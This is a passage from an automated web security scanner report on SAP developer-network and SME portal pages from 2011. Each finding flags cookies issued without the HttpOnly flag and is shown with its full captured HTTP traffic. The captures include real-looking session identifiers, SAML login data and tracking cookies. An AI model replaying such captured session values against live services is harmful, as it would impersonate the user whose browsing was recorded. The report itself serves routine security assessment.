Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/png
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODUzNzYtOThBNjdGQkUzMkMxOEEy
SDN_RES_KEY: /webcontent/uuid/30beea32-cf92-2d10-c39d-df6728c1d180
Content-Length: 1214
Content-Disposition: inline; filename="twitter.png"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:35 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODUzNzYtOThBNjdGQkUzMkMxOEEy; Domain=www.sdn.sap.com; Path=/irj/sdn
Set-Cookie: PortalAlias=sdn; Path=/

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...`IDATx..V[o.E..vg..d.8.].N..H(R...............HH}F...x@.*$.y.HHH<...-...Z.5%.....\......3.9..c.A
........9....;.\..#...K....F&.
...[SNIP]...
12.144. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/png
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODUyRTgtNjEyNTI5QjRCNzlDQ0YyMQ==
SDN_RES_KEY: /webcontent/uuid/9014fd41-cf92-2d10-6e8b-f69878cc0b7f
Content-Length: 1594
Content-Disposition: inline; filename="youtube.png"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:34 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODUyRTgtNjEyNTI5QjRCNzlDQ0YyMQ==; Domain=www.sdn.sap.com; Path=/irj/sdn
Set-Cookie: PortalAlias=sdn; Path=/

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..VilTU.=o..7K7.J[..R)
(..0.h..`....bL......Q..C-.!.D.H$Z6MQA.lV(-U.D..dm...3....{.E.O.5_..s...w.s.[..O..O}ia.....
.w=.
...[SNIP]...
12.145. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/png
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODUyRTAtMUU4RTc1RTYxMTIxN0RC
SDN_RES_KEY: /webcontent/uuid/e0dc1d46-ce92-2d10-1d90-bd6b59c27dc0
Content-Length: 1214
Content-Disposition: inline; filename="facebook.png"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:34 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODUyRTAtMUU4RTc1RTYxMTIxN0RC; Domain=www.sdn.sap.com; Path=/irj/sdn
Set-Cookie: PortalAlias=sdn; Path=/

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...`IDATx..UKo[E.....{..S;i.R.VKep..t..Km%....*b.J.K..a..u........b.G.....A.CI.h.y4N\'..}.....6M..J.........9...^y.3h.S..{'....*
...[SNIP]...
12.146. http://www.sdn.sap.com/irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/sdn/go/portal/prtroot/docs/webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: image/png
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODUyRjAtOEQwRTU3NzBGOEQ4Njc3Qg==
SDN_RES_KEY: /webcontent/uuid/f03915bd-cf92-2d10-478c-cbe7715c73b4
Content-Length: 1210
Content-Disposition: inline; filename="linkedin.png"
Cache-Control: max-age=129600
Date: Sat, 15 Oct 2011 14:24:34 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODUyRjAtOEQwRTU3NzBGOEQ4Njc3Qg==; Domain=www.sdn.sap.com; Path=/irj/sdn
Set-Cookie: PortalAlias=sdn; Path=/

.PNG
.
...IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e<...\IDATx..VAl.E.}3;.........!j.....T- D.....=#..R..8q..B.......'..P.M..A.J.R.I.RB*.86i....3......*..Z#.........X.....`f.h......6.
...[SNIP]...
12.147. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.application!2fcom.sap.sdn.folder.roles!2fcom.sap.sdn.folder.navigationroles!2fcom.sap.sdn.folder.scn!2fcom.sap.sdn.role.anonymous!2fcom.sap.sdn.tln.workset.weblogs!2fcom.sap.sdn.tln.iview.blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.application!2fcom.sap.sdn.folder.roles!2fcom.sap.sdn.folder.navigationroles!2fcom.sap.sdn.folder.scn!2fcom.sap.sdn.role.anonymous!2fcom.sap.sdn.tln.workset.weblogs!2fcom.sap.sdn.tln.iview.blogs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.application!2fcom.sap.sdn.folder.roles!2fcom.sap.sdn.folder.navigationroles!2fcom.sap.sdn.folder.scn!2fcom.sap.sdn.role.anonymous!2fcom.sap.sdn.tln.workset.weblogs!2fcom.sap.sdn.tln.iview.blogs?QuickLink=weblogs&blog=%2fweblogs%2ftopic%2f27 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTktNTM5RDkyMkRFMUMyNUFGNA==
Location: http://weblogs.sdn.sap.com/weblogs/topic/27
SDN_WEBLOG: /weblogs/topic/27
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:35 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODU0RTktNTM5RDkyMkRFMUMyNUFGNA==; Domain=www.sdn.sap.com; Path=/irj/servlet

12.148. http://www.sdn.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.sdnmain!2fcom.sap.sdn.SamlSCNLogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.sdnmain!2fcom.sap.sdn.SamlSCNLogon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.sdnmain!2fcom.sap.sdn.SamlSCNLogon HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/weblogs/topic/27
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fweblogs%2ftopic%2f27; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690554|check#true#1318688754

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 992
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:35 GMT
Connection: close
Set-Cookie: VisitID=QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==; Domain=www.sdn.sap.com; Path=/irj/servlet

<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/SDN/glbl/glbl_nn7.css?7.0.17.0.1">
<LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal
...[SNIP]...
12.149. https://www.sme.sap.com/irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /irj/servlet/prt/portal/prtroot/pcd!3aportal_content!2fcom.sap.sdn.folder.sdn!2fcom.sap.sdn.folder.development!2fcom.sap.sdn.folders.pages!2fcom.sap.sdn.folders.layout!2fcom.sap.sdn.pages.smemain!2fcom.sap.sdn.SamlLogon HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.sme.sap.com/irj/sme/logon
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; saplb_*=(J2EE3417600)3417650; Unique=QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==; JSESSIONID=(J2EE3417600)ID0819424750DB00193042231829069131End; SDNSTATE=526651564.14340.0000; a1slocale=en; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=https%3a%2f%2fwww.sme.sap.com%2firj%2fsme%2flogon; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; PortalAlias=sme

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MUYtMTMzMDdGRkVBMDYtRjcwQzA2OTAyMUYzREQ1Mg==
SDN_VISIT: QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==
Expires: 0
Content-Length: 992
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:33:53 GMT
Connection: keep-alive
Set-Cookie: VisitID=QUMxMDY0MUYtMTMzMDgwMERCMEItODg3REUyRjg0NjYyNDg2Nw==; Domain=www.sme.sap.com; Path=/irj/servlet; secure

<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/SDN/glbl/glbl_nn7.css?7.0.17.0.1">
<LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal
...[SNIP]...
12.150. https://www.sme.sap.com/irj/sme/cpslogon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sme.sap.com
Path:   /irj/sme/cpslogon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /irj/sme/cpslogon?SAMLRequest=fZFRS8MwFIX%2FSsl7m2TtnIS1MBiDgkqx4oNvMb1jgTaJuanovzfNRCbiAnk5ued%2B55Atyml0YjeHk3mEtxkwZO2%2BJj37Pnm8POcALH8dYJOv%2Bc1ttWYbxaqSZM%2FgUVtTk1XBSNYiztAaDNKEKDEejSzn6ydeiXIlqvKFZPtI0EaG5DqF4FBQKpWyswlYoHSFshNdUq2oHhxFtH%2BeSXawXkEKXZOjHBEWeCcR9Tv8KB%2FTaFCkgjWZvRFWokZh5AQoghL97v5OxODCeRussiNptsu0SD38hf%2B6PWLBL4VI0%2B%2B6PlifooEJWqWih65kW3qx%2Bsxx4iHuavedHbX6XDpNMvyP4gVPih7yYxoVs0EHSh81DIQ2Z8Lvv2y%2BAA%3D%3D&RelayState=oucqqqqqqqqoqqqroreeqobdexovrwyuvqxcqut HTTP/1.1
Host: www.sme.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; 